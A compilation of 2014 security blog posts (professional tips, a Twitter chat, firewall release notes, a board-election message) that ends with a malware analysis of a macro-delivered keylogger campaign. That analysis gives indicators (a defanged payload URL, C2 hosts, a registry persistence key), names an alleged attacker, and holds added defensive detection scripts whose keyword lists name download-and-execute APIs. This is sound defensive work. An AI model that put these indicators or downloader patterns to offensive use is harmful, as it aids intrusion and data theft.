(ISC)² Releases Set of Cybersecurity Tips for CEOs

To celebrate the 11th annual National Cyber Security Awareness Month (NCSAM), (ISC)² has released its fourth set of tips by security experts: cybersecurity tips for Chief Executive Officers (CEOs).

“Two-factor authentication (something you have, know, or are) has become very important for system access. Passwords alone just do not cut it anymore. This is extremely important as we see the rapid rise in financial transactions, particularly on mobile devices. Ask your bank if two-factor authentication is available and if not, get another bank that does. Credit card companies and online retailers are close behind.  They are not going to cover your losses through stolen identity and fraud much longer.  It’s your money and reputation, so do your part to protect yourself.

If you are a service provider and do not have two-factor as mandatory or as an option, you should explore how quickly you could provide it. It is becoming a business discriminator.”
-W. Hord Tipton, CISSP-ISSEP, CAP, Executive Director, (ISC)2

“Make sure you have an incident response plan in place for when you get breached.  Document, disseminate, and practice that plan with stakeholders from each and every segment of your business.

Also, know the current level and business impact of risk to your company.  Have a plan to periodically report on/communicate identified risk with the executive leadership and how it will be addressed.”
-Dan Waddell, CISSP, CAP, Director of Government Affairs, (ISC)2

[(ISC)2]

Cybersecurity Challenges and Opportunities Twitter chat – #cybersecuritychat

Last week, ISACA hosted a Twitter chat focusing on cybersecurity challenges and opportunities in support of Cybersecurity Month. ISACA’s International President Robert E. Stroud and International Vice President Ramsés Gallego participated as our guest panel. Review excerpts from the chat below:

ISACANews
Q1: What are the top #cybersecurity threats facing organizations today? #cybersecuritychat

RobertEStroud
A1: there are so many …. access to information, service disruption, theft….. #cybersecuritychat

ramsesgallego
A1: Understanding the risks. the human factor. PEOPLE using technologies. #cybersecuritychat #CyberSecMonth #ISACA

RobertEStroud
A1: Interesting change is the threat is external, not just internal… #cybersecuritychat

ISACANews
Q2: What #cybersecurity priorities should organizations focus on going into 2015? #cybersecuritychat

ramsesgallego
A2: Protecting the brand, saving IP, defending people. Both in digital & physical world. #cybersecuritychat #CyberSecMonth #ISACA

RobertEStroud
A2: People – getting their skills up to date to deal with the changing landscape. #cybersecuritychat #ISACA

ramsesgallego
A2: Communicate, communicate, communicate. Let people know the impact of misbehaving. #cybersecuritychat #CyberSecMonth #ISACA

RobertEStroud
A2: Skills need to include security implications of emerging technologies #cybersecuritychat #isaca

ramsesgallego
A2: Gettin’ the two most important assets at the core of protection: people and data. #cybersecuritychat #CyberSecMonth #ISACA

ISACANews
Q3: Where does #cybersecurity strategy fit within an organization? #cybersecuritychat

RobertEStroud
A3: Basic skills and awareness across the organization #cybersecuritychat

ramsesgallego
A3: Cybersecurity is for Governments, private companies, Healthcare, Education,… For us as a society. #cybersecuritychat #CyberSecMonth #ISACA

ramsesgallego
A3: @bwhort01 says ‘Everywhere. For everyone.’. Strategy implies us all. #cybersecuritychat #CyberSecMonth #ISACA

ramsesgallego
A3: Enterprise Strategy is AT THE TOP. From there, tactics. Cybersecurity is no different. #cybersecuritychat #CyberSecMonth #ISACA

RobertEStroud
A3: Boards are starting to talk about #cybersecurity #cybersecuritychat #isaca

For insights from other participants and to view the full chat history, see: https://storify.com/ISACANews/isaca-cybersecuritychat

[ISACA]

9 New Features and Topics to Check Out in PAN-OS 6.1

The much anticipated PAN-OS 6.1 is finally here and with it, many new topics to read that describe new features and functionality. Here are some recommendations, hand-picked by the Technical Publications team, to add to your reading list.

New Feature Documentation

Local Signature Generation Support for WF-500 Appliances

The WF-500 appliance can now generate signatures locally, eliminating the need to send any data to the public cloud in order to block malicious content. For more information, see Signature/URL Generation on a WF-500 Appliance.

Per App VPN for GlobalProtect

Leveraging the GlobalProtect Mobile Security Manager App Store feature introduced in GlobalProtect 6.1, the GlobalProtect app for iOS now supports Per App VPN. With Per App VPN, GlobalProtect can route all managed business apps through your corporate VPN, while allowing personal apps direct access to the Internet. For business apps with Per App VPN enabled, if the business app is unable to connect to the corporate VPN, the app will be unavailable to the user and will not send traffic until the secure connection is established. Users will still have access to their unmanaged apps, giving them the freedom to use their devices for personal use while protecting your critical business traffic. For more information, see Isolate Business Traffic.

Use Case: VM-Series Firewalls as GlobalProtect Gateways in AWS

If your users are more physically distributed than the supporting network infrastructure, GlobalProtect gateways in AWS remove the barriers to providing consistent security for all your users. The VM-Series firewall in AWS melds the security and IT logistics required to consistently and reliably protect devices used by mobile users in regions where you do not have a presence. By deploying the VM-Series firewall in the AWS cloud you can quickly and easily deploy GlobalProtect gateways around the world, and extend the corporate acceptable use policy to protect mobile users from threats and risky applications. For more information on how to deploy this solution, see Use Case: VM-Series Firewalls as GlobalProtect Gateways in AWS.

LACP Support

The firewall can now use Link Aggregation Control Protocol (LACP) to manage the interfaces in an aggregate group. Enabling LACP improves device and network availability by providing redundancy within aggregate groups and automating interface failure detection. For more information, see LACP.

Session End Reason Logging Support

Traffic logs now include a session end reason field to help troubleshoot connectivity and application availability issues in firewall traffic. For more information, see Session End Reason Logging.

New Documentation on Existing Features

In addition to new feature documentation, we’ve also expanded the depth of information about the following features.

Virtual Systems

Virtual systems are separate, logical firewall instances within a Palo Alto Networks firewall, which provide segmented administration and scalability of a firewall, along with reduced capital and operational expenses. For more information about benefits, use cases, and configuration of virtual systems, external zones, and shared gateways, see Virtual Systems.

Session Settings and Timeouts

This new topic describes settings and timers for TCP, UDP, and ICMPv6 sessions, in addition to IPv6, NAT64, jumbo frame size, MTU, accelerated aging, and captive portal authentication settings. For more information, see Session Settings and Timeouts.

DHCP

This new topic describes the Dynamic Host Configuration Protocol and how to configure interfaces on the firewall to act as a DHCP server, client, or relay agent. DHCP provides network addresses along with TCP/IP and link-layer configuration parameters to dynamically configured hosts. For more information, see DHCP.

NAT

This new topic describes source and destination Network Address Translation, NAT rule capacities, and the ability to configure Dynamic IP and Port NAT oversubscription. For more information, see NAT.

Want More PAN-OS 6.1 Documentation?

Check out the New Features Guide 6.1 and the PAN-OS 6.1 Release Notes on the Technical Documentation Site, or select the 6.1 facet (under OS Version) on the Document Search page!

Happy reading!

Your friendly Technical Publications team

[Palo Alto Networks Blog]

The New Face of (ISC)² Elections


A Message from the Board Communications Committee on Board Elections

This year the (ISC)² Board of Directors election process emerges after a massive year-long facelift. Through the recommendations of last year’s Board of Directors and the tenacity of the (ISC)² Management team, this year marks an unprecedented shift as the organization adjusts election processes based on member feedback.

We really try to be problem-solvers, and with our emphasis on member service, making sure we aligned the election process to meet the changing demands of our membership was paramount this year. You asked, we listened, and we have some exciting changes to share.

This year’s election runs from November 16-30, 2014 and our goal is to have the highest number of members voting in history. Here’s what we’re doing to make that happen.

New official candidate forum.
First, you’ll have the opportunity to interact one-on-one with all the candidates through an open forum online. Members are encouraged to interact, ask questions and really engage with the candidates through this self-moderated platform. The forum is hosted on LinkedIn as a public group. With 260 million users across more than 200 countries, LinkedIn was an obvious choice for a professional discussion forum. You can access the (ISC)² Board of Directors Election Candidates’ Forum through (ISC)² Election Central or directly on LinkedIn. You told us seeing bios and profiles on a website didn’t provide enough background on the candidates, and we agree! This new forum offers the platform to dive in to tough issues and get more background on your Board of Directors candidates. You can subscribe to email digests for the group or specific discussions, and you can post directly on the group 24×7.

Election Central.
Second, you’ll have a central place to access all the relevant information for this year’s election. The team is pleased to present the first Election Central, a portal to access candidates’ bios, candidate social media links, details about the election process, and informative overviews of what it means to be a Board of Directors member at (ISC)². Instead of logging in and clicking through several pages and menus to find pieces of information, we’ve put it neatly in one central place for you. You can use Election Central as your primary resource throughout the election process.

New voting platform.
Third, the team has worked tirelessly to move voting to a hosted balloting system that provides end-to-end auditable voting. This change is no small task for an organization with 100,000 members! Although the integrity of the voting process in years past was extremely high, the Board of Directors and Management took the extra step to migrate to a fully hosted, auditable voting platform. Results will still be validated by a third party as they’ve been in the past. We believe this change adds an extra layer of security and transparency by distancing the organization from the ballots and adding yet another layer of validation. Not only is the platform hosted and secured, but it leverages single sign-on for a streamlined login and seamless experience for members.

You, the members.
Last, but most certainly not least, our secret weapon is you – the member. You have the power to transform the future and be an active participant in choosing your representation on the (ISC)² Board of Directors. We believe this year marks an unprecedented level of participation, care and attention to, from and by the members. It takes an active membership to make elections meaningful, and we hope you’ll find these new changes empower you to be an active participant this year.

Is our new system perfect? I’m sure it’s not. Theodore Roosevelt said, “In any moment of decision, the best thing you can do is the right thing. The worst thing you can do is nothing.” And so we are doing something, and we view this year as the first big step toward meeting member demand, increasing member engagement, and bridging the gap between you, the organization, and your Board of Directors. We hope you’ll take advantage of the new resources available to you during this year’s election and of course, we welcome feedback as we continue to learn and grow.

On behalf of the (ISC)² Board Communications Committee and your (ISC)² Board of Directors, we welcome you to the 2015 election and ask for your participation in helping us grow and transform the organization to meet the challenges of a new year!

Jennifer Minella, CISSP
Chair, Board Communications Committee
(ISC)² Board of Directors

[(ISC)² Blog]

Examining a VBA-Initiated Infostealer Campaign

While Microsoft Office documents that leverage malicious, embedded Visual Basic for Applications (VBA) macros are not a new thing, their use has noticeably increased this year, thanks in part to their simplicity and effectiveness.

Threat actors commonly use this class of malware to drop a second stage payload on victim systems. Even though Microsoft mitigates this threat by disabling macros by default, the percentage of users who explicitly bypass this protection and enable macros remains high.

The most effective attacker strategy remains the tried and true spear phishing attack, which exploits the human factor: the message is made to look authentic by appearing to originate from a legitimate organization or individual, and it carries role-relevant or topic-of-interest content to entice its intended target. This post examines an information stealer campaign that leveraged a VBA macro script, focusing on its progression from delivery to Command and Control (C2), and on its attribution to a malicious actor for context on objectives and motivation.

Delivery and Exploitation

The recent campaign started with an email sent to an employee responsible for processing financial statements at a global financial organization (Figure 1). The sender’s email address was spoofed as originating from an energy company. Subsequent analysis would show that this façade was very thin; yet, it is often all that is required to encourage a user to open an attachment or click on a link that then executes malicious code.

Figure 1: Delivery of a phishing message containing malicious DOC file

The above e-mail employs common pressure tactics for phishing messages. Specifically, it touches on two areas of potential concern for a target: financial responsibility and the introduction of a state of uncertainty and confusion. In this case, the role of the target as a processor of financial statements might mean that the target is accustomed to receiving similarly structured legitimate e-mails; accordingly, they may open a malicious attachment without a second thought.

The second factor is much broader and relates to how humans deal with uncertainty. Without specific awareness and training, some users may be inclined to open the attachment, wondering why the e-mail was sent to them. In psychology, this is referred to as the “Need for Closure” personality trap.

The next layer of this attack is found within the malicious DOC file once a victim opens it. With a system properly configured to protect against automatic execution of VBA macros, no malicious code has been run at this point. Figure 2 presents a screenshot of the malicious attachment’s displayed contents.

Figure 2: Displayed contents of malicious DOC file, TTAdvise.doc

This content further compounds the two points of concern for the target, and now presents a convenient option of clicking “Enable Content” to obtain closure on the matter. Despite a security warning (Figure 3), a number of users still choose to enable the content, allowing the malicious VBA macros to run on their system.

Figure 3: Often ignored Microsoft security warning against enabling macro content

After enabling macros, none of the promised data is shown to the victim; however, the malicious VBA macro script executes in the background without the user’s knowledge.

VBA Macro Script

The embedded VBA macro script is shown in Figure 4.

Figure 4: Embedded VBA macro script

This script operates as a downloader, pulling a second stage payload from the following URL (note: at the time of this post, the referenced domain was no longer active):

hxxp://icqap.com/oludouble.exe
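The macro in Figure 4 is not reproduced here, so the following is an added triage script (not code from the original post) that shows how an analyst scores extracted VBA source for the downloader pattern described above: an auto-executing procedure, a download API, and a launch call, with any embedded URLs pulled out and defanged. The SAMPLE_MACRO text and its URL are constructed placeholders for this example, not the campaign's macro or indicator.

```python
import re

# Constructed sample of a downloader-style macro, written for this example.
# It is NOT the macro from Figure 4; the URL is a placeholder, not an indicator.
SAMPLE_MACRO = r'''
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _
    ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\stage2.exe"
    URLDownloadToFileA 0, "http://example.invalid/stage2.exe", target, 0, 0
    Shell target, vbHide
End Sub
'''

# Procedure names that run as soon as macros are enabled, with no further click.
AUTO_EXEC = ("AutoOpen", "Document_Open", "AutoExec", "Auto_Open", "Workbook_Open")
# APIs/objects a macro typically uses to fetch a second stage.
DOWNLOAD = ("URLDownloadToFile", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP",
            "WinHttp.WinHttpRequest", "ADODB.Stream")
# Ways a macro launches what it fetched.
EXECUTE = ("Shell", "WScript.Shell", "ShellExecute", "CreateProcess")

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"'<>]+")


def extract_urls(vba: str) -> list:
    """Return every http/https/ftp URL literal found in the macro source."""
    return URL_RE.findall(vba)


def defang(url: str) -> str:
    """Rewrite a URL so it cannot be clicked (http -> hxxp, '.' -> '[.]')."""
    scheme, sep, rest = url.partition("://")
    return scheme.lower().replace("http", "hxxp") + sep + rest.replace(".", "[.]")


def triage(vba: str) -> dict:
    """Report which auto-exec, download and execute indicators a macro contains."""
    lowered = vba.lower()
    report = {
        "auto_exec": [n for n in AUTO_EXEC
                      if re.search(r"\b" + re.escape(n) + r"\b", vba, re.I)],
        "download": [n for n in DOWNLOAD if n.lower() in lowered],
        "execute": [n for n in EXECUTE if n.lower() in lowered],
        "urls": [defang(u) for u in extract_urls(vba)],
    }
    if report["auto_exec"] and report["download"] and report["execute"]:
        report["verdict"] = "downloader"   # runs on open, fetches, launches
    elif report["download"] or report["execute"] or report["urls"]:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "benign"
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key:>10}: {value}")
```

Feed it the VBA source dumped by a tool such as olevba; the three-way "downloader" verdict matters more than any single keyword, since legitimate macros often contain one of the indicators but rarely all three.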

Installation and Persistence

Static analysis of the “oludouble.exe” binary is summarized in Figure 5.

Figure 5: Static analysis of downloaded second stage malware, oludouble.exe

Once executed, “oludouble.exe” drops two executables (paths shown are for Windows XP):

  • C:\Documents and Settings\Administrator\Desktop\exchangepre.exe
  • C:\Documents and Settings\Administrator\Application Data\Windows Update.exe

Both binaries are identical copies of each other (Figure 6).

Figure 6: Files dropped from second stage malware, oludouble.exe

The second stage malware also copies itself to the following location (Windows XP path) and deletes its original file:

C:\Documents and Settings\Administrator\Application Data\Temp.exe

Persistence (so the malware restarts after a reboot or logoff) is achieved by adding the following value under the current user’s Run key, set to the path of the “Windows Update.exe” binary (Figure 7). Because the value lives under HKCU, writing it requires no administrative privileges:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update

Figure 7: Windows registry modification for persistence
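As an added hunting example (not from the original post), the script below audits Run-key entries for the two tells this sample shows: a value name that mimics a Windows component, and an executable living in a user-writable profile directory. SAMPLE_RUN_ENTRIES is a constructed snapshot whose first entry mirrors the shape of the one described above; the live read via winreg only runs on Windows and is otherwise skipped.

```python
import re
import sys

# Constructed snapshot of HKCU\...\Run as (value name, command) pairs, written
# for this example. The first entry mirrors the shape described in the post
# (an XP-style path under the user's profile); the others are typical benign
# entries, not real data from the analysed host.
SAMPLE_RUN_ENTRIES = [
    ("Windows Update",
     r"C:\Documents and Settings\Administrator\Application Data\Windows Update.exe"),
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("Adobe Reader Speed Launcher",
     r'"C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"'),
]

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Directories an unprivileged user can write to (XP and Vista+ layouts).
USER_WRITABLE = re.compile(
    r"\\(application data|appdata|local settings|temp|desktop|users\\[^\\]+)\\", re.I)
# Locations where a genuine OS or vendor component would normally live.
TRUSTED_ROOTS = re.compile(r"^[a-z]:\\(windows|program files( \(x86\))?)\\", re.I)
# Value names chosen to look like part of Windows.
IMPERSONATION = re.compile(r"windows update|microsoft|security|svchost|explorer", re.I)


def command_path(command: str) -> str:
    """Extract the executable path from a Run value, handling quotes and spaces."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    m = re.match(r"(.+?\.exe)\b", command, re.I)   # unquoted path may contain spaces
    return m.group(1) if m else command.split(" ")[0]


def audit_run_entries(entries) -> list:
    """Return the entries that look like user-land persistence, with reasons."""
    findings = []
    for name, command in entries:
        path = command_path(command)
        trusted = bool(TRUSTED_ROOTS.match(path))
        reasons = []
        if USER_WRITABLE.search(path) and not trusted:
            reasons.append("executable lives in a user-writable profile directory")
        if IMPERSONATION.search(name) and not trusted:
            reasons.append("value name mimics a Windows component outside Windows/Program Files")
        if reasons:
            findings.append({"name": name, "path": path, "reasons": reasons})
    return findings


def read_live_run_entries() -> list:
    """On Windows, enumerate the current user's Run key; elsewhere return []."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:          # no more values under the key
                break
            entries.append((name, str(data)))
            index += 1
    return entries


if __name__ == "__main__":
    for finding in audit_run_entries(read_live_run_entries() or SAMPLE_RUN_ENTRIES):
        print(finding["name"], "->", finding["path"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

The same check applies to HKLM\...\Run and the RunOnce keys; an entry that trips both heuristics, as the “Windows Update” value does here, deserves a hash lookup and a look at the file's signature before anything else.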

Malware Capabilities

API calls extracted from “Windows Update.exe” (b6275be58a539ea9548d02ab6229c768) hint at its capabilities (Figure 8).

Figure 8: API calls found in “Windows Update.exe” binary

Based on these API calls, the malware appears to support enumeration of a variety of system information. Additionally, the use of “GetAsyncKeyState”, which obtains key press status, could be indicative of keylogging capabilities.

Further investigation and research revealed that this malware leverages the Predator Pain keylogger, a favorite tool of this threat actor. Overall, this malware functions as an information stealer (Infostealer), including capture and exfiltration of the following types of information:

  • Website credentials
  • Financial information
  • Chat session contents
  • Email contents

Command and Control (C2)

Once installed, the malware determines its Internet-facing IP address and then connects to the following hosts:

  • whatismyipaddress.com
  • www.myip.ru
  • mail[.]rivardxteriaspte.co[.]uk
  • ftp[.]rivardxteriaspte.co[.]uk

The first two are legitimate public IP lookup services. The latter two are C2 servers run by the malicious actor, reached over SMTP and FTP respectively. A lookup against one of these public services followed shortly by outbound SMTP or FTP to an unfamiliar host is a useful hunting pattern for this family, since neither channel is one an ordinary workstation normally opens on its own.
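To make that hunting pattern concrete, here is an added detection example (not code from the original post) that correlates egress log entries: it remembers when each internal host last queried one of the IP lookup services named above and raises an alert if that host then opens SMTP or FTP to a destination outside the approved mail servers within a short window. The log format, the 10.0.0.x hosts, the c2-placeholder.example names standing in for the actor's C2 hostnames, and the mail.victim.example allowlist entry are all constructed for this example.

```python
from datetime import datetime, timedelta

# Legitimate public IP lookup services named in the post; the malware consults
# one of these first so the operator knows which network the victim sits on.
IP_CHECK_SERVICES = frozenset({"whatismyipaddress.com", "www.myip.ru"})
# Ports for the two exfiltration channels the post describes (SMTP and FTP),
# including the SMTP submission and implicit-TLS variants.
EXFIL_PORTS = frozenset({25, 465, 587, 21})

# Constructed egress log: "<ISO time> <src ip> <dst host> <dst port>", written
# for this example. The c2-placeholder.example hosts stand in for the post's C2
# hostnames; 10.0.0.37 shows a benign IP check followed by normal corporate mail.
SAMPLE_LOG = """\
2014-10-21T09:15:02Z 10.0.0.21 whatismyipaddress.com 80
2014-10-21T09:15:03Z 10.0.0.21 www.myip.ru 80
2014-10-21T09:15:09Z 10.0.0.21 mail.c2-placeholder.example 587
2014-10-21T09:16:40Z 10.0.0.21 ftp.c2-placeholder.example 21
2014-10-21T09:20:00Z 10.0.0.37 www.myip.ru 80
2014-10-21T09:21:00Z 10.0.0.37 mail.victim.example 25
"""


def parse_log(text: str) -> list:
    """Turn the constructed log format into sorted (time, src, host, port) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, port = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       src, host.lower(), int(port)))
    return sorted(events)


def correlate(text: str, window: timedelta = timedelta(minutes=10),
              mail_allowlist: frozenset = frozenset()) -> list:
    """Alert when a host hits an IP-check service and then, within `window`,
    opens SMTP/FTP to a destination that is not an approved mail server."""
    last_ip_check = {}
    alerts = []
    for ts, src, host, port in parse_log(text):
        if host in IP_CHECK_SERVICES:
            last_ip_check[src] = ts
            continue
        if port not in EXFIL_PORTS or host in mail_allowlist:
            continue
        seen = last_ip_check.get(src)
        if seen is not None and ts - seen <= window:
            alerts.append({"src": src, "host": host, "port": port,
                           "seconds_after_ip_check": int((ts - seen).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG, mail_allowlist=frozenset({"mail.victim.example"})):
        print(alert)
```

The allowlist is what keeps this from firing on every user whose browser happens to load an IP lookup page; without it the 10.0.0.37 sequence would alert as well, so tune it to the organisation's real mail relays before deploying.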

Attribution

E-mail headers are a valuable source of intelligence when investigating these types of attacks (Figure 9).

Figure 9: E-mail headers for phishing message

In this example, the phishing message appeared to the victim to originate from a legitimate organization. Closer inspection of the ‘X-Env-Sender’ header, which records the envelope sender seen by the receiving mail gateway, showed that the displayed sender address was spoofed. In an attempt to slide past cursory examination, the malicious actor sent the message through an open mail relay, server[.]edm.sg. Another important header field for this message is ‘Reply-To’, which contains a valid e-mail address for this malicious actor:

cimaskozy(at)yahoo.com

Setting the ‘Reply-To’ email header field to a valid address is another common threat actor tactic. It supports elicitation activities by that actor should a target respond to the message (i.e., further social engineering). Yet, this technique should also present a red flag to a user, as the initial façade of the originating e-mail address is removed at that point.
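As an added example (not from the original post), the script below performs the header comparison described in this section with Python's standard email module: it extracts the domain of the visible From address, the envelope sender recorded by the gateway (X-Env-Sender, falling back to Return-Path), and the Reply-To address, and flags any mismatch. SAMPLE_RAW is a constructed message that reproduces only the pattern; its names, domains, IP and subject are placeholders, not the campaign's indicators, and the TTAdvise.doc attachment name is taken from Figure 2.

```python
import email
from email.utils import parseaddr

# Constructed message headers, written for this example. They reproduce the
# pattern the post describes (display From on one domain, envelope sender on
# another, Reply-To on a webmail domain); none of the names, domains or the IP
# are the campaign's real indicators.
SAMPLE_RAW = """\
Received: from relay.example ([203.0.113.10])
        by mx.victim.example with ESMTP id 12345; Tue, 21 Oct 2014 09:12:33 +0000
X-Env-Sender: bulk@relay.example
From: "Accounts Payable" <payables@energyco.example>
Reply-To: <someone@webmail.example>
To: <statements@victim.example>
Subject: Statement advice (constructed)
Content-Type: application/msword; name="TTAdvise.doc"

(body omitted)
"""


def domain_of(header_value: str) -> str:
    """Domain part of the first address in a header value, lower-cased ('' if none)."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def header_red_flags(raw: str) -> list:
    """Compare the addresses a user sees with the ones the MTA actually used."""
    msg = email.message_from_string(raw)
    from_dom = domain_of(msg.get("From"))
    # Envelope sender as recorded by the receiving gateway; Return-Path is the
    # usual fallback when the gateway does not add an X-Env-Sender header.
    env_dom = domain_of(msg.get("X-Env-Sender") or msg.get("Return-Path"))
    reply_dom = domain_of(msg.get("Reply-To"))
    flags = []
    if from_dom and env_dom and env_dom != from_dom:
        flags.append(f"envelope sender domain '{env_dom}' differs from From domain '{from_dom}'")
    if from_dom and reply_dom and reply_dom != from_dom:
        flags.append(f"Reply-To domain '{reply_dom}' differs from From domain '{from_dom}'")
    return flags


if __name__ == "__main__":
    for flag in header_red_flags(SAMPLE_RAW):
        print("RED FLAG:", flag)
```

Either mismatch on its own is common in legitimate bulk mail, which is why the check reports both separately rather than giving a single verdict; the combination with a macro-bearing Office attachment is what should route the message to a triage queue.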

Research on the above email address reveals that this actor has been active in the cybercrime underground since at least 2010. Specifically, this actor goes by the handle “Skozzy” and is a known carder, seller of compromised credit card information, and facilitator of related services. Accordingly, we categorize “Skozzy” as primarily a cybercrime actor motivated by financial gain, although roles across nation state, cybercrime, hacktivist and ankle-biter/script kiddies are not mutually exclusive and – in fact – continue to become fuzzier over time.

Figure 10 is a screenshot of a YouTube post by “Skozzy”  (skozzy11) from 2010.

Figure 10: YouTube post from “Skozzy”, 2010

Figure 11 is a screenshot from a Pastebin post, also from 2010.

Figure 11: Pastebin post from “Skozzy”, 2010

“Skozzy” is also active on HackForums[.]net and has shared thoughts and experiences related to keylogging tools like Limitless Logger and Predator Pain (Figure 12). Of particular note, the infostealer/keylogger tools that “Skozzy” prefers are able to steal much more than what has been observed so far for this actor.

Figure 12: Posts on HackForums[.]net regarding keyloggers

“Skozzy” also shares that Predator Pain is a preferred tool, as it offers great support (Figure 13).

Figure 13: “Skozzy” prefers the Predator Pain keylogger

Deeper analysis and correlation across domains and samples that we believe are related to this threat actor will be covered in subsequent blog content.

Conclusion

This case epitomizes how easy it has become these days to steal sensitive information from victims who fall prey to such campaigns. Associated tools can be bought online for less than $100, which often also includes support packages that rival those of mainstream commercial software.

Stolen information can be used for more than standard credit card fraud. The crossover between malicious actor objectives may include opportunistic aspects of cyber espionage, extortion, identity theft, intellectual capital theft, and much more. It is also important to note that none of the major anti-virus (AV) vendors detected this threat at the time it was delivered. The natural gap between creation of these threats and a corresponding signature for their detection by traditional AV remains a sweet spot for successful malicious campaigns. Therefore, it is increasingly important to properly architect and deploy network and endpoint protections to ensure thorough and effective defense of computing and information assets.

The Palo Alto Networks Enterprise Security Platform is a prime example of technology meant to address and minimize the risk associated with emerging threats. Learn more about the platform here.

[Palo Alto Networks Blog]
